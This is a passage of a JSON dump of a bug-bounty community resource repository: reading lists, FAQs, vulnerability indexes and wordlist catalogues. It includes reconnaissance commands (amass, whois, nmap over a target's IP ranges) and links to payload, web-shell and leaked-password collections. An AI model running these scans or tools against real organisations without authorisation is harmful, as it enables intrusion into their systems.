[
  {
    "path": ".github/FUNDING.yml",
    "content": "# These are supported funding model platforms\n\ncustom: https://paypal.me/Vicky481\n\n\n"
  },
  {
    "path": ".pdfs/INDEX",
    "content": "** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n/Resources/blob/main/Writeups/Create.md\n\nRESOURCES:(Readme.md)\n\n1. Conferences > Readme.md (Conferences around the world)\n2. Setup  > Readme.md (SetupHelpDesk(Under Development))\n3. Writeups > Readme.md (/BugBounty Basic -BBb_00, BugBounty Let's Hunt - BBh_01 & Bugbounty Hunters - BB_Hunter)\n      \n      BBbasics.md\n      BBIntermidiate.md\n      BBHunter.md\n      CmsServerDatabase.md \n      Create.md\n      javascript.md\n\n4. Bugbountycheetsheet > Readme.md\n      bugbountyplatform.md\n\n5. Bugbounty > Readme.md  \n             > 0AuthMisconfiguration.md\n             \n      XSS\n         \n         1 \tXSS Documentation\n          2 \tXSS Practice labs\n          3 \tXSS Disclosure/Reports/POC\n          4 \tXSS Mindmap\n          5 \tXSS Tools\n          6 \tXSS Ebooks\n          7 \tXSS Researchers\n          8 \tXSS CVE\n      \n      SSO \n         \n         1 \tSSO Documentation\n          2 \tSSO Practice labs\n          3 \tSSO Disclosure/Reports/POC\n          4 \tSSO Mindmap\n          5 \tSSO Tools\n          6 \tSSO Ebooks\n          7 \tSSO Researchers\n          8 \tSSO CVE\n\n6. BB_Setup in WSL2 > README.md \n                    > BB_Setup.sh  \n                    > WSL2.md\n           \n7. Getting_Started_with_Cybersecurity \n8. Ebooks.md\n9. ResoursesMindmap.md\n\n"
  },
  {
    "path": "API-HelpDesk/Readme.md",
    "content": "# Here are 23 free ways to learn about API security testing: by Hany Soliman\n\n1. Video: Traceable AI, API Hacking 101.\n2. Video: Katie Paxton-Fear, API Hacking.\n3. Video: Bugcrowd, Bad API, hAPI Hackers.\n4. Video: OWASP API Security Top 10 Webinar.\n5. Blog: Detectify, How To Hack API's in 2021.\n6. Blog: HackXpert, Let's build an API to hack.\n7. Video: Bugcrowd, API Security 101 by Sadako.\n8. Video: David Bombal, Free API Hacking Course.\n9. Blog: Wallarm, How To Hack API In 60 Minutes.\n10. Website: APIsecurity IO, API Security Articles.\n11. Blog: Curity, The API Security Maturity Model.\n12. Blog: Expedited Security, API Security MegaGuide.\n13. Video: Grant Ongers, API Security Testing Workshop.\n14. Videos: The XSS Rat, API Testing And Securing Guide.\n15. Blog: APIsec, OWASP API Security Top 10: A Deep Dive.\n16. Podcast: We Hack Purple, API Security Best Practices.\n17. Blog: Kontra Application Security, OWASP Top 10 for API.\n18. Blog: Secure Delivery, OWASP API Top 10 CTF Walk-through.\n19. Blog: SmartBear, How To Hack An API And Get Away With It.\n20. Blog: Ping Identity, API Security: The Complete Guide 2022.\n21. Video: SANS Offensive Operations, Analyzing OWASP API Security.\n22. Blog: Bend Theory, Exploiting Unintended Functionality in API's.\n23. Blog: Bright Security, Complete Guide to Threats, Methods & Tools.\n\n- https://github.com/shieldfy/API-Security-Checklist\n"
  },
  {
    "path": "Bugbounty/BB-FAQ/BB_FAQ.md",
    "content": "# BUG BOUNTY FAQ - frequently asked questions (Beginner friendly - Under Development)\nNote: Contents inside the **RESETHACKER Community** are to help our community members; content belongs to the respective authors and the RESETHACKER Team.\n\nBugBounty FAQ   | Title\n-- | --\n**0** Getting Started in Cybersecurity Advice | [Be a hacker and break into cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)\n**0** Bugbounty FAQ - Imran parray | [General questions asked by people](https://github.com/imran-parray/General-Notes)\n**0** Bugbounty Setup HelpDesk | [Got stuck during setup? We have a solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)\n**0** Job/Internship/Resume HelpDesk | [Find cybersecurity jobs/interviews, advice to get jobs, crack interviews etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n**0** Stay up to date with conferences | [Track all the upcoming conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**0** Trace latest rewards, CVEs, writeups, tools, reports, disclosures and ongoing trends in the community | [Resources to keep up with the cybersecurity community](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n**0** Build with community | [Create, build and automate for personal use](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)\n"
  },
  {
    "path": "Bugbounty/BB-FAQ/Domain-Information.md",
    "content": "## Domain Information :\n\n- Find acquisitions (Google's 6-month rule), ASNs, reverse WHOIS (identifying IPs and main TLDs)\n\n\t\tExample: List_of_mergers_and_acquisitions_by_COMPANYNAME\n\t\thttps://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Alphabet\n\t\thttps://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Meta_Platforms\n\n\t\t- Search eg:\n\t\tresponsible disclosure 2022\n\t\tCompany responsible disclosure\n\t\tOr check out the keywords suggested by bug hunters or search engines.\n\n\t\t- Go to a bug bounty platform and filter out newly listed programs manually.\n\t\t- 3rd-party websites such as Crunchbase can be helpful as well.\n\n- To check the ASN of a domain's IP, visit: ASN Number eg: AS714\n\n\thttps://bgp.he.net or ASN Tool - MxToolBox\n\n\t- An Autonomous System Number (ASN) is a way to represent a collection of IPs and who owns them.\n\t- The IP address pool is spread across five Regional Internet Registries (RIRs): AFRINIC, APNIC, ARIN, LACNIC, and RIPE NCC.\n\t- The providers then allocate IP ranges to different organizations.\n\t- If a company wishes to buy a block of IP addresses, they must purchase it from one of these providers.\n\n- To check CIDR range: eg 31.13.55.0/24\n\n\t- A Classless Inter-Domain Routing (CIDR) range is a short way of representing a group of IP addresses.\n\t- Compromising a server hosted on a company’s CIDR range may lead you directly into their internal network.\n\n\t- Use (https://mxtoolbox.com/asn.aspx) to find a company’s ASN as well as their correlating CIDR ranges. Note that small organizations won’t have a dedicated CIDR range; they normally use third-party cloud vendors such as AWS and Rackspace, or they will host their stuff under an internet service provider (ISP) IP. However, large companies tend to have their own CIDR range and we can use this information to target machines hosted there.\n\n\t- Amass tool: to find domains on a given CIDR range.\n\t\t\tamass intel -cidr 31.13.55.0/24\n\n- Reverse WHOIS: to find assets owned by an organization or person.\n\n\t- There are several online sources that constantly monitor and scrape the WHOIS database for analysis. We can use these services to find domains that are owned by the same organization.\n\tReverse Whois Lookup - ViewDNS.info\n\n- WHOIS: (domain owners from ASN number)\n\t- Searching the WHOIS database we can find all domains registered by the email “*.example.com”. Some people will use WHOIS guard to hide this information, but many companies forget to enable it.\n\n\t\twhois -h whois.radb.net -- '-i origin AS714' | grep -Eo \"([0-9.]+){4}/[0-9]+\" | uniq\n\t\tOR\n\t\twhois -h whois.radb.net -- '-i origin ' | grep -Eo \"([0-9.]+){4}/[0-9]+\" | sort -u\n\n\t\tTry command: host example.com or dig example.com or ping example.com (to know the IP address)\n\n- DNS Information\n\t- Without the Domain Name System (DNS) you wouldn't be able to correlate domains to IPs.\n\t- DNS records contain several bits of information that can be used to correlate domains to one another.\n\n\t- The A, NS, and MX records are the most popular ways to find domains that are likely to be owned by the same person.\n\n\t- Try command: dig example.com (gives you the CNAME - use it to check for subdomain takeover with the help of https://github.com/EdOverflow/can-i-take-over-xyz)\n\t\tWe can also see that the domain points to the CNAME “anything.organization.com”; if we can register this domain we win.\n\t- NOTE that the organization could be GitHub, Cloudflare, AWS etc.\n\n- Reverse DNS:\n\n\t- If domains share the same A, NS, or MX record then it is possible they are owned by the same person.\n\t- We can use reverse IP, reverse name server, and reverse mail server searches to find these domains.\n\t- There may be some false positives but these can be filtered out.\n\n\t- This technique will greatly increase your scope as a bug bounty hunter.\n\n- Name server:\n\t- Large companies often host their own name servers so they can route traffic to the correct IPs.\n\t- These servers are configured by the organization who owns them, so it stands to reason that Microsoft wouldn’t have domains pointing to a Facebook name server.\n\n\tnslookup -type=NS example.com\n\n\t- Reverse name server:\n\n\t\tThere are hundreds of thousands of domains pointing to GoDaddy nameservers.\n\t\tTo check how many domains point to a nameserver:\n\t\t● https://domaineye.com\n\t\tbut you may have a few false positives in there.\n\n\t- Reverse mail server:\n\n\t\tThe MX record returned must be owned by the target organization.\n\t\tTo perform a reverse mail server search:\n\t\t● https://domaineye.com\n\n\t\tnslookup -type=MX example.com\n\n- Reverse IP\n\t- Utilizing the company's CIDR ranges we can perform a reverse IP search to find any domains that are hosted on those IPs. Some people will also use the A record of their target domain to perform a reverse IP search. Again, you can use https://domaineye.com/\n\n---\nWhat we have learned till now:\n\n## Finding acquisitions: the idea is to find more IPs/domains related to the target.\n\n\tGet IP: ping xyz.com or dig xyz.com or host xyz.com\n\tCheck ASN\n\tCheck CIDR range\n\tWHOIS: (domain owners by the same organization or company)\n\tReverse WHOIS\n\tDNS Information\n\tReverse DNS\n\tReverse name server\n\tReverse mail server\n\tReverse IP\n\tFavicon hashing\n\n- Note:\n\t1. Get ASN from IP > get CIDR range and save it to IP.TXT\n\n\t2. whois -h whois.radb.net -- '-i origin AS714' | grep -Eo \"([0-9.]+){4}/[0-9]+\" | uniq > IP.TXT\n\tRun Nmap:\tnmap -iL IP.TXT\n\n\t3. Collect subdomains and check the CNAME of all the subdomains with a single command.\n\n\n### Tool recommended: Amass for asset discovery\n- Amass to find ASNs\n\t\tamass intel -org example.com\n- Amass to list domains running on a given ASN\n\t\tamass intel -asn AS714\n- To find domains on a given CIDR range\n\t\tamass intel -cidr 31.13.55.0/24\n- Utilize reverse WHOIS searches to find other domains purchased by the same user\n\t\tamass intel -whois -d example.com\n\n"
  },
  {
    "path": "Bugbounty/BB-FAQ/Readme.md",
    "content": "##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability\n\n1. The report should have all the necessary details including the vulnerable URL (most important), reproduction steps, PoC, impact and, if possible, mitigation steps.\n\n2. When you are explaining the impact of any vulnerability, don’t just tell them \"I can steal the session cookie and do an account takeover\"; try to do it and then report it. Reporting anything and asking for a bounty or hall of fame is not worth it at all.\n\n3. This is for the XSS guys: after finding a popup, don't report it yet; try to do further exploitation and increase your impact.\n\n4. Report multiple vulnerabilities to a company and then approach them to get their VAPT done by you; it will help you in the future.\n\n5. Understand what’s critical for a company and focus on those types of bugs when you are hunting. Trust me, it will save your time for sure and you won’t get demotivated after seeing the triager reply on your bug that it is not applicable, etc.\n"
  },
  {
    "path": "Bugbounty/BBMindmap/Readme.md",
    "content": "## This folder contains multiple Bugbounty Mindmaps curated by all the amazing bughunters.\nUse them as inspiration for creating your own web pentest / bug bounty recon and hunting workflow.\n\n- [How Does Mind Mapping Help for Better Bug Bounty](https://www.xmind.net/blog/en/how-does-mind-mapping-help-for-better-bug-bounty/)\n\n\n- [*Compilation of recon workflows by pentester land](https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html)\n- [*Bughunter-handbook - Collection of Mindmaps for Bugbounty](https://gowthams.gitbook.io/bughunter-handbook/mindmaps)\n- [Collection of Mind-Maps of Several Things - forked from Imran-parray](https://github.com/RESETHACKER-COMMUNITY/Mind-Maps)\n\n- [Dsopas - BB approach](https://github.com/dsopas/assessment-mindset)\n- [Iamfrogy - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n- [ITSecurityguard - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n- [Ahmad Halabi - BB approach](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n- [AjitYadav - web hacking & BB](https://ajityadav.net/assets/images/WH-Recon-BBB-Chapter5-Full.png)\n- [Rohit gautam - BB Tools for Vulnerability](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)\n"
  },
  {
    "path": "Bugbounty/Readme.md",
    "content": "# Bug Bounty Helpdesk (Under Development)\n\n  > Note: Contents inside the **RESETHACKER Community** are to help our community members; content belongs to the respective authors and the RESETHACKER Team.\n\nBugBounty HelpDesk  | Title\n-- | --\n**0** Bug bounty FAQ | [Friendly Q/A](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n**0** ResetHacker - Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps setups on Windows, Linux, Docker and VPS (AWS, Azure, GCP etc.)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)\n**0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)\n**0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermediate - Take it as a reference to challenge yourself](https://github.com/harsh-bothra/learn365)\n**0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, and conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards)\n**0** Cipher387 | [Dork collection for different search engines](https://github.com/cipher387/Dorks-collections-list)\n**0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/)\n**0** Streaak | [Got an API key? Use Keyhacks](https://github.com/streaak/keyhacks)\n**0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md)\n**0** Wordlists | [All Wordlists in one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)\n**0** Bug bounty writeups | [Vulnerability-based write-ups in one place](https://github.com/alexbieber/Bug_Bounty_writeups)\n**0** Bug Bounty Mind-Map collection | [Bugbounty Mindmaps curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap)\n**0** Public Bug bounty | [Collection of public Bugbounty programs](https://github.com/resethacker/public-bugbounty-programs)\n**0** StayUpToDate | [Latest rewards, CVEs, writeups, tools, reports, disclosures and ongoing trends in the community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n\nBugBounty HelpDesk  | Title\n-- | --\n**1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology)\n**2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)\n**3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups)\n**4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification)\n**5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/)\n**6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/)\n**7** Book of Bug Bounty Tips | [Collection of \"BugBounty\" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/)\n**8** EdOverflow | [Cheatsheets and a must-check-out for subdomain takeovers](https://github.com/EdOverflow/bugbounty-cheatsheet)\n**9** Harsh-Bothra | [Security Explained - Highly recommended to understand vulnerable code files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources)\n**10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/)\n**11** Offensive Security Cheatsheet | [Web Pentesting and bug bounty](https://cheatsheet.haax.fr/web-pentest/bug_bounty_tips/)\n**12** @zapstiko | [Curated bugbounty resources from Twitter](https://github.com/zapstiko/Bug-Bounty)\n**13** AllVideoPocsFromHackerOne | [TOP 20 Weaknesses from HackerOne disclosed reports](https://github.com/zeroc00I/AllVideoPocsFromHackerOne)\n\n## Getting started with BugBounty - Under development\n1. | [Resources for getting started with BugBounty - BBb_00](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)\n2. | [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)\n\nThis contains the detailed resources for people getting started with BugBounty.\n\nIndex | [BugBounty Basic - BBb_00](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)\n--- | ---\n**1** | Linux Distributions\n**2** | Basic understanding of the web application before you start hunting\n**3** | Learning resources\n**4** | Paid certifications / courses\n**5** | Bug Bounty platforms offering bounties\n**6** | Practice platforms\n**7** | [Talks - Bug Bounty]\n**8** | [Pentesting & Bug Hunting Resources - How to Start?]\n**9** | [Bug reports]\n**10** | [Vulnerability Assessment and one-liners]\n**11** | [Bug hunting Reconnaissance writeups]\n**12** | [Tools for bug bounty]\n**13** | [Ebooks]\n**14** | [Misc]\n\nThis contains the detailed resources for people\n**Already Doing BugBounty**\nIndex | [Web pentesting: Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)\n--- | ---\n**1** | [Pentesting Reports/Disclosures]\n**2** | [Web Pentesting MindMaps]\n**3** | [Web security Testing Writeups]\n**4** | [Bugbounty Reports/Disclosures]\n**5** | [Bugbounty Methodology/Reconnaissance]\n\n\n\n"
  },
  {
    "path": "Bugbounty/Table_of_Vulnerability.md",
    "content": "**Writeups**: Vulnerability cheatsheets\nThis file contains the detailed write-ups on cheatsheets, reports, disclosures, etc. - Updating Soon\n\n## Reference:\n- [imran-parray](https://github.com/imran-parray/Web-Sec-CheatSheet)\n\n\n\n# Table of Vulnerability\n\nIndex | [BugBounty Let's Hunt - BBh_01](/Writeups/BBintermediate.md)\n--- | ---\n**1** | [XSS](/XXS/Readme.md)\n**2** | [SQL injection](Sqlinjection.md)\n**3** | [LFI](LFI/Readme.md)\n**4** | [Business logic Attacks by Dheerajmadhukar](https://github.com/Dheerajmadhukar/notes/tree/main/BugBounty/Business_Logic_Attacks)\n**x** | [Captcha Bypass]()\n**x** | [Clickjacking]()\n**x** | [Client Side Template Injection - CSTI]()\n**x** | [Command Injection]()\n**x** | [Content Security Policy - CSP Bypass]()\n**x** | [Cookies Hacking]()\n**x** | [CORS - Misconfigurations & Bypass]()\n**x** | [CRLF Injection]()\n**x** | [CSRF (Cross Site Request Forgery)]()\n**x** | [Dangling Markup - HTML scriptless injection]()\n**x** | [Deserialization]()\n**x** | [Email Header Injection]()\n**x** | [File Inclusion]()\n**x** | [File Upload]()\n**x** | [IDOR]()\n**x** | [JWT Vulnerabilities]()\n**x** | [LDAP Injection]()\n**x** | [NoSQL Injection]()\n**x** | [Open Redirect]()\n**x** | [Race Condition]()\n**x** | [SSRF (Server Side Request Forgery)]()\n**x** | [SSTI (Server Side Template Injection)]()\n**x** | [Unicode Normalization vulnerability]()\n**x** | [XPATH Injection]()\n**x** | [XSLT Server Side Injection]()\n**x** | [XXE (XML External Entity)]()\n** ** | [OAuth Misconfiguration and bypass]()\n** ** | [2FA Misconfiguration & bypass]()\n** ** | [MFA Misconfiguration & bypass]()\n** ** | [Broken link hijacking Misconfiguration & bypass]()\n** ** | [Subdomain Takeover (mainly CNAME) Misconfiguration & bypass]()\n\n\n\n          //Index | [Bugbounty Hunters - BB_Hunter](/Writeups/BBHunter.md)\n          --- | ---\n          Index | [BugBounty Basic -BBb_00 ](/Writeups/BBbasics.md)\n          --- | ---//\n          \nIndex | Getting started with Bug bounty & web pentesting\n---|---\n**0** Pentesterlabs | [Web pentesting part 1](https://pentesterlab.com/exercises/web_for_pentester/course)\n**0** Pentesterlabs | [Web pentesting part 2](https://pentesterlab.com/exercises/web_for_pentester_ii/course)\n**1** Sanjib Sinha | [Bug Bounty Hunting for Web Security with OWASP Webgoat](https://github.com/Apress/bug-hunting-web-security)\n\n\n"
  },
  {
    "path": "Bugbounty/Website_inputs_testing.md",
    "content": "Index | Topics\n---|---\n**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articles/user-authentication-best-practices-checklist)\n**2** Gaurav Bewal | [Registration & Login Page Testing for Developers/Pentesters](https://www.loginradius.com/blog/async/test-cases-for-registration-and-login-page/)\n\n\n\n\n"
  },
  {
    "path": "Bugbounty/Wordlists/AllWordlists.md",
    "content": "# Top recommended wordlists available for pentesting, red teaming, bugbounty and password bruteforcing❤️😳\n\n#### Purpose: This repository is a collection of multiple types of wordlists in one place, gathered from their respective authors and organizations, that could be used during security assessments. Use it to curate your own wordlist as per your requirements.\n    \n    List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, infrastructure,\n    high quality wordlists for content and subdomain discovery, payloads to exploit vulnerabilities and many more.\n    \n        Wordlists 1\n        Payloads and Burpsuite wordlists\n        Wordlists 2\n        Password Bruteforce wordlists\n        Resources - Video, writeups, tools and reference for wordlists\n    \n\nAuthor | Wordlists 1\n-- | --\n▫️ | [SecLists - danielmiessler](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists.\n▫️ | [Continuously Updated wordlists for Assets - Assetnote](https://wordlists.assetnote.io/) - High quality wordlists for content and subdomain discovery.\n▫️ | [Fuzzdb - fuzzdb-project](http://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.\n▫️ | [OneListForAll - six2dez](https://github.com/six2dez/OneListForAll) - Rockyou for web fuzzing\n▫️ | [Bug-Bounty-Wordlists - Karanxa](https://github.com/Karanxa/Bug-Bounty-Wordlists) - All the important wordlists used while bug hunting.\n▫️ | [Webapp-wordlists - p0dalirius](https://github.com/p0dalirius/webapp-wordlists) - Wordlists for each version of common web applications and content management systems (CMS).\n▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things including services, servers, databases etc.\n\nAuthor | Payloads and Burpsuite wordlists\n-- | --\nPayloadsAllTheThings - swisskyrepo | [A list of useful payloads and bypasses for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings)\nOrwagodfather | [Payloads to exploit web vulnerabilities and different services.](https://github.com/orwagodfather/WordList)\nFuzz.txt - Bo0oM | [Potentially dangerous files](https://github.com/Bo0oM/fuzz.txt)\nIntruderPayloads - 1N3 | [A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.](https://github.com/1N3/IntruderPayloads)\nScavenger - wordlist from #burp history | [Burp extension to create target-specific and tailored wordlists from #burp history.](https://github.com/0xDexter0us/Scavenger)\n\n\nAuthor | Wordlists 2\n-- | --\nWordsmith - skahwah | [Assists with creating tailored wordlists. This is mostly based on geolocation.](https://github.com/skahwah/wordsmith)\nBetterdefaultpasslist - govolution | [Default password fuzz for ports and databases.](https://github.com/govolution/betterdefaultpasslist)\nPydictor - LandGrey | [A powerful and useful hacker dictionary builder for a brute-force attack.](https://github.com/LandGrey/pydictor)\nMentalist - sc0tfree | [A graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.](https://github.com/sc0tfree/mentalist)\nBasubanakar | [login-panel wordlists](https://github.com/basubanakar/login-panel-wordlist)\nSkweez | [Spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)\n\n\nAuthor | Password Bruteforce wordlists\n-- | --\n**1** Hashmob | [Largest collection of password hashes discovered in database breaches (or other sources)](https://hashmob.net/)\n**2** passphrase-wordlist - initstring | [Passphrase wordlist and hashcat rules for offline cracking of long, complex passwords](https://github.com/initstring/passphrase-wordlist)\n**3** Password-Scripts - laconicwolf | [A collection of scripts that help with different aspects of password cracking, such as wordlist generation, mask analysis, and positional character frequency.](https://github.com/laconicwolf/Password-Scripts)\n**4** Pwdb-Public - FlameOfIgnis | [A collection of all the data extracted from 1 billion leaked credentials from the internet.](https://github.com/FlameOfIgnis/Pwdb-Public)\n**5** Probable-Wordlists - berzerk0 | [Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!](https://github.com/berzerk0/Probable-Wordlists)\n**6** Brutas - Wordlists and passwords handcrafted with ♥️ | [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)\n**7** COOK | [An overpowered wordlist generator, splitter, merger, finder and saver; creates word permutations and combinations, applies different encodings/decodings and everything you need.](https://github.com/giteshnxtlvl/cook)\n**8** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong! This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phrase](https://github.com/initstring/passphrase-wordlist)\n**9** Insidetrust | [Wordlists for creating statistically likely usernames for use in username enumeration, simulated password attacks and other security testing tasks.](https://github.com/insidetrust/statistically-likely-usernames)\n\n\nIndex | Resources - Video, writeups, tools and reference for wordlists\n-- | --\n**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)\n**1** Utkusen writeup | [generating-personalized-wordlists - utkusen](https://utkusen.com/blog/generating-personalized-wordlists)\n**2** Gotator - Josue87 | [A tool to generate DNS wordlists through permutations.](https://github.com/Josue87/gotator)\n**3** CWFF - D4Vinci | [A tool to create your custom wordlist for fuzzing](https://github.com/D4Vinci/CWFF)\n**4** Python Code | [CTH wordlists: passwords/keyboard - sorokinpf](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)\n\nIndex | More references for wordlists\n-- | --\n**0** Wordlists for everything | [Infosec Wordlists](https://github.com/xajkep/wordlists)\n**0** Awesome-wordlists - gmelodie | [Another curated list of wordlists for bruteforcing and fuzzing](https://github.com/gmelodie/awesome-wordlists)\n\n\n\n"
  },
  {
    "path": "Bugbounty/Wordlists/Readme.md",
    "content": "TODO:\n1. Create a wordlist based on backend technology and add a Readme.md to summarize that technology.\n2. Create a common wordlist of default pages for different technologies.\nEg: cgi-sys/defaultwebpage.cgi\n"
  },
  {
    "path": "Bugbounty/Wordlists.md",
    "content": "# Bruteforce Wordlists\nIndex | wordlists\n-- | --\n▫️ | [SecLists](https://github.com/danielmiessler/SecLists)\n▫️ | [Fuzzdb](http://github.com/fuzzdb-project/fuzzdb)\n▫️ | [betterdefaultpasslist](https://github.com/govolution/betterdefaultpasslist)\n▫️ | [statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)\n▫️ | [pydictor](https://github.com/LandGrey/pydictor)\n▫️ | [mentalist](https://github.com/sc0tfree/mentalist)\n▫️ | [wordsmith](https://github.com/skahwah/wordsmith)\n▫️ | [IntruderPayloads](https://github.com/1N3/IntruderPayloads)\n▫️ | [fuzz.txt](https://github.com/Bo0oM/fuzz.txt)\n▫️ | [Password-Scripts](https://github.com/laconicwolf/Password-Scripts)\n▫️ | [Pwdb-Public](https://github.com/FlameOfIgnis/Pwdb-Public)\n▫️ | [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)\n▫️ | [WordList](https://github.com/orwagodfather/WordList)\n▫️ | [Assetnote](https://wordlists.assetnote.io/)\n▫️ | [Webapp-wordlists](https://github.com/p0dalirius/webapp-wordlists)\n▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)\n▫️ | [generating-personalized-wordlists](https://utkusen.com/blog/generating-personalized-wordlists)\n▫️ | [gotator](https://github.com/Josue87/gotator)\n▫️ | [CWFF](https://github.com/D4Vinci/CWFF)\n▫️ | [passwords/keyboard](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)\n▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)\n▫️ | [passphrase-wordlist](https://github.com/initstring/passphrase-wordlist)\n▫️ | [Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)\n▫️ | [awesome-wordlists](https://github.com/gmelodie/awesome-wordlists)\n▫️ | [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n\n\nIndex | wordlists\n-- | --\n**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)\n**1** | [login-panel-wordlist](https://github.com/basubanakar/login-panel-wordlist)\n**2** Brutas - Wordlists and passwords handcrafted with ♥️ | [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)\n**3** COOK | [An overpowered wordlist generator, splitter, merger, finder and saver; creates word permutations and combinations, applies different encodings/decodings and everything you need.](https://github.com/giteshnxtlvl/cook)\n**4** Scavenger | [Burp extension to create target-specific and tailored wordlists from #burp history.](https://github.com/0xDexter0us/Scavenger)\n**5** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong! This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phrase](https://github.com/initstring/passphrase-wordlist)\n**6** Webapp Wordlists | [This repository contains wordlists for each version of common web applications and content management systems (CMS). Each version contains a wordlist of all the files and directories for this version.](https://github.com/p0dalirius/webapp-wordlists)\n**7** OneListForAll | [This is a project to generate huge wordlists for web fuzzing; if you just want to fuzz with a good wordlist use the file onelistforallmicro.txt.](https://github.com/six2dez/OneListForAll)\n**8** skweez | [skweez (pronounced like \"squeeze\") spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)\n"
  },
  {
    "path": "Bugbounty/bugbounty-FAQ.md",
